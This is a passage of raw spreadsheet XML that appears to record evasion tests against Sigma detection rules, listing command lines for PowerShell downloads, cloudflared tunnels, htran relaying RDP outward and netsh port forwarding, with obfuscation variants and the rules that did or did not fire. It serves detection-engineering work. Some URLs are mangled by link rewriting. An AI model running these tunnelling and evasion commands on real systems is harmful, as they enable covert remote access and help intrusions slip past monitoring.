        <v>0</v>
      </c>
    </row>
    <row r="789" ht="15.75" customHeight="1" s="42">
      <c r="A789" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B789" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_download_office_domain</t>
        </is>
      </c>
      <c r="C789" s="41" t="inlineStr">
        <is>
          <t>Suspicious Download from Office Domain</t>
        </is>
      </c>
      <c r="D789" s="41" t="inlineStr">
        <is>
          <t>00d49ed5-4491-4271-a8db-650a4ef6f8c1</t>
        </is>
      </c>
      <c r="E789" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -Command "Invoke-WebRequest ('[https://attachment.outlook.live.net](https://attachment.outlook.live.net)' + '/owa/test.txt') -OutFile 'C:\Temp\test.txt'"</t>
        </is>
      </c>
      <c r="F789" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G789" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H789" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I789" s="41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789" s="41" t="n"/>
      <c r="K789" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="790" ht="15.75" customHeight="1" s="42">
      <c r="A790" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B790" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_download_office_domain</t>
        </is>
      </c>
      <c r="C790" s="41" t="inlineStr">
        <is>
          <t>Suspicious Download from Office Domain</t>
        </is>
      </c>
      <c r="D790" s="41" t="inlineStr">
        <is>
          <t>00d49ed5-4491-4271-a8db-650a4ef6f8c1</t>
        </is>
      </c>
      <c r="E790" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -Command "$u='[https://attachment.outlook.live.net](https://attachment.outlook.live.net)'; iwr ($u + '/owa/test.txt') -OutFile 'C:\Temp\test.txt'"</t>
        </is>
      </c>
      <c r="F790" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G790" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H790" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I790" s="41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790" s="41" t="n"/>
      <c r="K790" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="791" ht="15.75" customHeight="1" s="42">
      <c r="A791" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B791" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_download_office_domain</t>
        </is>
      </c>
      <c r="C791" s="41" t="inlineStr">
        <is>
          <t>Suspicious Download from Office Domain</t>
        </is>
      </c>
      <c r="D791" s="41" t="inlineStr">
        <is>
          <t>00d49ed5-4491-4271-a8db-650a4ef6f8c1</t>
        </is>
      </c>
      <c r="E791" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -Command "Start-BitsTransfer -Source ('[https://attachment.outlook.live.net](https://attachment.outlook.live.net)' + '/owa/test.txt') -Destination 'C:\Temp\test.txt'"</t>
        </is>
      </c>
      <c r="F791" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G791" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H791" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I791" s="41" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J791" s="41" t="n"/>
      <c r="K791" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="792" ht="15.75" customHeight="1" s="42">
      <c r="A792" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B792" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_download_office_domain</t>
        </is>
      </c>
      <c r="C792" s="41" t="inlineStr">
        <is>
          <t>Suspicious Download from Office Domain</t>
        </is>
      </c>
      <c r="D792" s="41" t="inlineStr">
        <is>
          <t>00d49ed5-4491-4271-a8db-650a4ef6f8c1</t>
        </is>
      </c>
      <c r="E792" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -Command "$d='attachment.outlook.live.net'; Invoke-WebRequest ('https://' + $d + '/owa/test.txt') -OutFile 'C:\Temp\test.txt'"</t>
        </is>
      </c>
      <c r="F792" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G792" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H792" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I792" s="41" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution (5e3cc4d8-3e68-43db-8656-eaaeefdec9cc); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J792" s="41" t="n"/>
      <c r="K792" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="793" ht="15.75" customHeight="1" s="42">
      <c r="A793" s="41" t="inlineStr">
        <is>
          <t>t1090.001</t>
        </is>
      </c>
      <c r="B793" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_quicktunnel_execution</t>
        </is>
      </c>
      <c r="C793" s="41" t="inlineStr">
        <is>
          <t>Cloudflared Quick Tunnel Execution</t>
        </is>
      </c>
      <c r="D793" s="41" t="inlineStr">
        <is>
          <t>222129f7-f4dc-4568-b0d2-22440a9639ba</t>
        </is>
      </c>
      <c r="E793" s="41" t="inlineStr">
        <is>
          <t>C:\Tools\cloudflared.exe tunnel --url http://localhost:22</t>
        </is>
      </c>
      <c r="F793" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G793" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H793" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I793" s="41" t="inlineStr">
        <is>
          <t>Renamed Cloudflared.EXE Execution (e0c69ebd-b54f-4aed-8ae3-e3467843f3f0); Cloudflared Quick Tunnel Execution (222129f7-f4dc-4568-b0d2-22440a9639ba)</t>
        </is>
      </c>
      <c r="J793" s="41" t="n"/>
      <c r="K793" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="794" ht="15.75" customHeight="1" s="42">
      <c r="A794" s="41" t="inlineStr">
        <is>
          <t>t1090.001</t>
        </is>
      </c>
      <c r="B794" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_quicktunnel_execution</t>
        </is>
      </c>
      <c r="C794" s="41" t="inlineStr">
        <is>
          <t>Cloudflared Quick Tunnel Execution</t>
        </is>
      </c>
      <c r="D794" s="41" t="inlineStr">
        <is>
          <t>222129f7-f4dc-4568-b0d2-22440a9639ba</t>
        </is>
      </c>
      <c r="E794" s="41" t="inlineStr">
        <is>
          <t>C:\Tools\cloudflared.exe tunnel "-url" http://localhost:22</t>
        </is>
      </c>
      <c r="F794" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G794" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H794" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I794" s="41" t="inlineStr">
        <is>
          <t>Renamed Cloudflared.EXE Execution (e0c69ebd-b54f-4aed-8ae3-e3467843f3f0); Cloudflared Quick Tunnel Execution (222129f7-f4dc-4568-b0d2-22440a9639ba)</t>
        </is>
      </c>
      <c r="J794" s="41" t="n"/>
      <c r="K794" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="795" ht="15.75" customHeight="1" s="42">
      <c r="A795" s="41" t="inlineStr">
        <is>
          <t>t1090.001</t>
        </is>
      </c>
      <c r="B795" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_quicktunnel_execution</t>
        </is>
      </c>
      <c r="C795" s="41" t="inlineStr">
        <is>
          <t>Cloudflared Quick Tunnel Execution</t>
        </is>
      </c>
      <c r="D795" s="41" t="inlineStr">
        <is>
          <t>222129f7-f4dc-4568-b0d2-22440a9639ba</t>
        </is>
      </c>
      <c r="E795" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\Tools\cloudflared.exe tunnel -u^rl http://localhost:22</t>
        </is>
      </c>
      <c r="F795" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G795" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H795" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I795" s="41" t="inlineStr">
        <is>
          <t>Cloudflared Quick Tunnel Execution (222129f7-f4dc-4568-b0d2-22440a9639ba)</t>
        </is>
      </c>
      <c r="J795" s="41" t="n"/>
      <c r="K795" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="796" ht="15.75" customHeight="1" s="42">
      <c r="A796" s="41" t="inlineStr">
        <is>
          <t>t1090.001</t>
        </is>
      </c>
      <c r="B796" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_quicktunnel_execution</t>
        </is>
      </c>
      <c r="C796" s="41" t="inlineStr">
        <is>
          <t>Cloudflared Quick Tunnel Execution</t>
        </is>
      </c>
      <c r="D796" s="41" t="inlineStr">
        <is>
          <t>222129f7-f4dc-4568-b0d2-22440a9639ba</t>
        </is>
      </c>
      <c r="E796" s="41" t="inlineStr">
        <is>
          <t>C:\Tools\cloudflared.exe tunnel	-url	http://localhost:22</t>
        </is>
      </c>
      <c r="F796" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G796" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H796" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I796" s="41" t="inlineStr">
        <is>
          <t>Renamed Cloudflared.EXE Execution (e0c69ebd-b54f-4aed-8ae3-e3467843f3f0); Cloudflared Quick Tunnel Execution (222129f7-f4dc-4568-b0d2-22440a9639ba)</t>
        </is>
      </c>
      <c r="J796" s="41" t="n"/>
      <c r="K796" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="797" ht="15.75" customHeight="1" s="42">
      <c r="A797" s="41" t="inlineStr">
        <is>
          <t>t1090.001</t>
        </is>
      </c>
      <c r="B797" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_cloudflared</t>
        </is>
      </c>
      <c r="C797" s="41" t="inlineStr">
        <is>
          <t>Renamed Cloudflared.EXE Execution</t>
        </is>
      </c>
      <c r="D797" s="41" t="inlineStr">
        <is>
          <t>e0c69ebd-b54f-4aed-8ae3-e3467843f3f0</t>
        </is>
      </c>
      <c r="E797" s="41" t="inlineStr">
        <is>
          <t>C:\temp\svchost.exe tunnel run -c^onfig config.yaml -t^oken secret_token</t>
        </is>
      </c>
      <c r="F797" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G797" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H797" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I797" s="41" t="inlineStr">
        <is>
          <t>Renamed Cloudflared.EXE Execution (e0c69ebd-b54f-4aed-8ae3-e3467843f3f0); Cloudflared Tunnel Execution (9a019ffc-3580-4c9d-8d87-079f7e8d3fd4)</t>
        </is>
      </c>
      <c r="J797" s="41" t="n"/>
      <c r="K797" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="798" ht="15.75" customHeight="1" s="42">
      <c r="A798" s="41" t="inlineStr">
        <is>
          <t>t1090.001</t>
        </is>
      </c>
      <c r="B798" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_cloudflared</t>
        </is>
      </c>
      <c r="C798" s="41" t="inlineStr">
        <is>
          <t>Renamed Cloudflared.EXE Execution</t>
        </is>
      </c>
      <c r="D798" s="41" t="inlineStr">
        <is>
          <t>e0c69ebd-b54f-4aed-8ae3-e3467843f3f0</t>
        </is>
      </c>
      <c r="E798" s="41" t="inlineStr">
        <is>
          <t>copy C:\cloudflared.exe C:\temp\app.exe &amp;&amp; C:\temp\app.exe tunnel cleanup -conf^ig config.yaml -connector-id 12345</t>
        </is>
      </c>
      <c r="F798" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G798" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H798" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I798" s="41" t="n"/>
      <c r="J798" s="41" t="n"/>
      <c r="K798" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="799" ht="15.75" customHeight="1" s="42">
      <c r="A799" s="41" t="inlineStr">
        <is>
          <t>t1090.001</t>
        </is>
      </c>
      <c r="B799" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_renamed_cloudflared</t>
        </is>
      </c>
      <c r="C799" s="41" t="inlineStr">
        <is>
          <t>Renamed Cloudflared.EXE Execution</t>
        </is>
      </c>
      <c r="D799" s="41" t="inlineStr">
        <is>
          <t>e0c69ebd-b54f-4aed-8ae3-e3467843f3f0</t>
        </is>
      </c>
      <c r="E799" s="41" t="inlineStr">
        <is>
          <t>C:\temp\utility.exe "tunnel" "run" "-url" "[https://test.trycloudflare.com](https://www.google.com/search?q=https://test.trycloudflare.com)"</t>
        </is>
      </c>
      <c r="F799" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G799" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H799" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I799" s="41" t="n"/>
      <c r="J799" s="41" t="n"/>
      <c r="K799" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="800" ht="15.75" customHeight="1" s="42">
      <c r="A800" s="41" t="inlineStr">
        <is>
          <t>t1102</t>
        </is>
      </c>
      <c r="B800" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_cleanup</t>
        </is>
      </c>
      <c r="C800" s="41" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Connections Cleanup</t>
        </is>
      </c>
      <c r="D800" s="41" t="inlineStr">
        <is>
          <t>7050bba1-1aed-454e-8f73-3f46f09ce56a</t>
        </is>
      </c>
      <c r="E800" s="41" t="inlineStr">
        <is>
          <t>C:\Tools\cloudflared.exe tunnel cleanup --connector-id 99999999-8888-7777-6666-555555555555</t>
        </is>
      </c>
      <c r="F800" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G800" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H800" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I800" s="41" t="inlineStr">
        <is>
          <t>Renamed Cloudflared.EXE Execution (e0c69ebd-b54f-4aed-8ae3-e3467843f3f0); Cloudflared Tunnel Connections Cleanup (7050bba1-1aed-454e-8f73-3f46f09ce56a); Cloudflared Tunnel Connections Cleanup (7050bba1-1aed-454e-8f73-3f46f09ce56a)</t>
        </is>
      </c>
      <c r="J800" s="41" t="n"/>
      <c r="K800" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="801" ht="15.75" customHeight="1" s="42">
      <c r="A801" s="41" t="inlineStr">
        <is>
          <t>t1102</t>
        </is>
      </c>
      <c r="B801" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_cloudflared_tunnel_cleanup</t>
        </is>
      </c>
      <c r="C801" s="41" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Connections Cleanup</t>
        </is>
      </c>
      <c r="D801" s="41" t="inlineStr">
        <is>
          <t>7050bba1-1aed-454e-8f73-3f46f09ce56a</t>
        </is>
      </c>
      <c r="E801" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\Tools\cloudflared.exe tunnel cle^anup -connector-id 99999999-8888-7777-6666-555555555555</t>
        </is>
      </c>
      <c r="F801" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G801" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H801" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I801" s="41" t="inlineStr">
        <is>
          <t>Cloudflared Tunnel Connections Cleanup (7050bba1-1aed-454e-8f73-3f46f09ce56a)</t>
        </is>
      </c>
      <c r="J801" s="41" t="n"/>
      <c r="K801" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="802" ht="15.75" customHeight="1" s="42">
      <c r="A802" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B802" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_htran_or_natbypass</t>
        </is>
      </c>
      <c r="C802" s="41" t="inlineStr">
        <is>
          <t>HackTool - Htran/NATBypass Execution</t>
        </is>
      </c>
      <c r="D802" s="41" t="inlineStr">
        <is>
          <t>f5e3b62f-e577-4e59-931e-0a15b2b94e1e</t>
        </is>
      </c>
      <c r="E802" s="41" t="inlineStr">
        <is>
          <t>htran.exe -tran	192.168.1.50 3389 203.0.113.50 8888</t>
        </is>
      </c>
      <c r="F802" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G802" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H802" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I802" s="41" t="n"/>
      <c r="J802" s="41" t="n"/>
      <c r="K802" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="803" ht="15.75" customHeight="1" s="42">
      <c r="A803" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B803" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_htran_or_natbypass</t>
        </is>
      </c>
      <c r="C803" s="41" t="inlineStr">
        <is>
          <t>HackTool - Htran/NATBypass Execution</t>
        </is>
      </c>
      <c r="D803" s="41" t="inlineStr">
        <is>
          <t>f5e3b62f-e577-4e59-931e-0a15b2b94e1e</t>
        </is>
      </c>
      <c r="E803" s="41" t="inlineStr">
        <is>
          <t>htran.exe "-tran" 192.168.1.50 3389 203.0.113.50 8888</t>
        </is>
      </c>
      <c r="F803" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G803" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H803" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I803" s="41" t="n"/>
      <c r="J803" s="41" t="n"/>
      <c r="K803" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="804" ht="15.75" customHeight="1" s="42">
      <c r="A804" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B804" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_htran_or_natbypass</t>
        </is>
      </c>
      <c r="C804" s="41" t="inlineStr">
        <is>
          <t>HackTool - Htran/NATBypass Execution</t>
        </is>
      </c>
      <c r="D804" s="41" t="inlineStr">
        <is>
          <t>f5e3b62f-e577-4e59-931e-0a15b2b94e1e</t>
        </is>
      </c>
      <c r="E804" s="41" t="inlineStr">
        <is>
          <t>htran.exe  -tran  192.168.1.50 3389 203.0.113.50 8888</t>
        </is>
      </c>
      <c r="F804" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G804" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H804" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I804" s="41" t="n"/>
      <c r="J804" s="41" t="n"/>
      <c r="K804" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="805" ht="15.75" customHeight="1" s="42">
      <c r="A805" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B805" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_htran_or_natbypass</t>
        </is>
      </c>
      <c r="C805" s="41" t="inlineStr">
        <is>
          <t>HackTool - Htran/NATBypass Execution</t>
        </is>
      </c>
      <c r="D805" s="41" t="inlineStr">
        <is>
          <t>f5e3b62f-e577-4e59-931e-0a15b2b94e1e</t>
        </is>
      </c>
      <c r="E805" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c htran.exe -tr^an 192.168.1.50 3389 203.0.113.50 8888</t>
        </is>
      </c>
      <c r="F805" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G805" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H805" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I805" s="41" t="n"/>
      <c r="J805" s="41" t="n"/>
      <c r="K805" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="806" ht="15.75" customHeight="1" s="42">
      <c r="A806" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B806" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C806" s="41" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D806" s="41" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E806" s="41" t="inlineStr">
        <is>
          <t>netsh "interface" "portproxy" "add" "v4tov4" listenport=1337 connectport=1337 connectaddress=127.0.0.1</t>
        </is>
      </c>
      <c r="F806" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G806" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H806" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I806" s="41" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J806" s="41" t="n"/>
      <c r="K806" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="807" ht="15.75" customHeight="1" s="42">
      <c r="A807" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B807" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C807" s="41" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D807" s="41" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E807" s="41" t="inlineStr">
        <is>
          <t>netsh interface portproxy add v4tov4 listenport=1337 connectport=1337 connectaddress=127.0.0.1</t>
        </is>
      </c>
      <c r="F807" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G807" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H807" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I807" s="41" t="n"/>
      <c r="J807" s="41" t="n"/>
      <c r="K807" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="808" ht="15.75" customHeight="1" s="42">
      <c r="A808" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B808" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C808" s="41" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D808" s="41" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E808" s="41" t="inlineStr">
        <is>
          <t>netsh interface portproxy add v4tov4 listenport=1337 connectport=1337 c=127.0.0.1</t>
        </is>
      </c>
      <c r="F808" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G808" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H808" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I808" s="41" t="n"/>
      <c r="J808" s="41" t="n"/>
      <c r="K808" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="809" ht="15.75" customHeight="1" s="42">
      <c r="A809" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B809" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C809" s="41" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D809" s="41" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E809" s="41" t="inlineStr">
        <is>
          <t>netsh interface portproxy add v4tov4 connectport=1337 connectaddress=127.0.0.1 listenport=1337</t>
        </is>
      </c>
      <c r="F809" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G809" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H809" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I809" s="41" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J809" s="41" t="n"/>
      <c r="K809" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="810" ht="15.75" customHeight="1" s="42">
      <c r="A810" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B810" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding_3389</t>
        </is>
      </c>
      <c r="C810" s="41" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D810" s="41" t="inlineStr">
        <is>
          <t>782d6f3e-4c5d-4b8c-92a3-1d05fed72e63</t>
        </is>
      </c>
      <c r="E810" s="41" t="inlineStr">
        <is>
          <t>netsh.exe "interface" "portproxy" add v4tov4 listenport=3389 listenaddress=192.0.2.10 connectport=3389 connectaddress=192.0.2.10</t>
        </is>
      </c>
      <c r="F810" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G810" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H810" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I810" s="41" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J810" s="41" t="n"/>
      <c r="K810" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="811" ht="15.75" customHeight="1" s="42">
      <c r="A811" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B811" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding_3389</t>
        </is>
      </c>
      <c r="C811" s="41" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D811" s="41" t="inlineStr">
        <is>
          <t>782d6f3e-4c5d-4b8c-92a3-1d05fed72e63</t>
        </is>
      </c>
      <c r="E811" s="41" t="inlineStr">
        <is>
          <t>netsh.exe	interface	portproxy	add	v4tov4	listenport=3389	listenaddress=192.0.2.10	connectport=3389	connectaddress=192.0.2.10</t>
        </is>
      </c>
      <c r="F811" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G811" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H811" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I811" s="41" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J811" s="41" t="n"/>
      <c r="K811" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="812" ht="15.75" customHeight="1" s="42">
      <c r="A812" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B812" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding_3389</t>
        </is>
      </c>
      <c r="C812" s="41" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D812" s="41" t="inlineStr">
        <is>
          <t>782d6f3e-4c5d-4b8c-92a3-1d05fed72e63</t>
        </is>
      </c>
      <c r="E812" s="41" t="inlineStr">
        <is>
          <t>netsh.exe interface portproxy add v4tov4 listenport=0x0D3D listenaddress=192.0.2.10 connectport=3389 connectaddress=192.0.2.10</t>
        </is>
      </c>
      <c r="F812" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G812" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H812" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I812" s="41" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE (782d6f3e-4c5d-4b8c-92a3-1d05fed72e63); New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J812" s="41" t="n"/>
      <c r="K812" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="813" ht="15.75" customHeight="1" s="42">
      <c r="A813" s="41" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B813" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding_3389</t>
        </is>
      </c>
      <c r="C813" s="41" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D813" s="41" t="inlineStr">
        <is>
          <t>782d6f3e-4c5d-4b8c-92a3-1d05fed72e63</t>
        </is>
      </c>
      <c r="E813" s="41" t="inlineStr">
        <is>
          <t>netsh.exe interface portproxy add v4tov4 listenport="3389" listenaddress=192.0.2.10 connectport=3389 connectaddress=192.0.2.10</t>
        </is>
      </c>
      <c r="F813" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G813" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H813" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I813" s="41" t="inlineStr">
        <is>
          <t>RDP Port Forwarding Rule Added Via Netsh.EXE (782d6f3e-4c5d-4b8c-92a3-1d05fed72e63); New Port Forwarding Rule Added Via Netsh.EXE (322ed9ec-fcab-4f67-9a34-e7c6aef43614)</t>
        </is>
      </c>
      <c r="J813" s="41" t="n"/>
      <c r="K813" s="41" t="b">
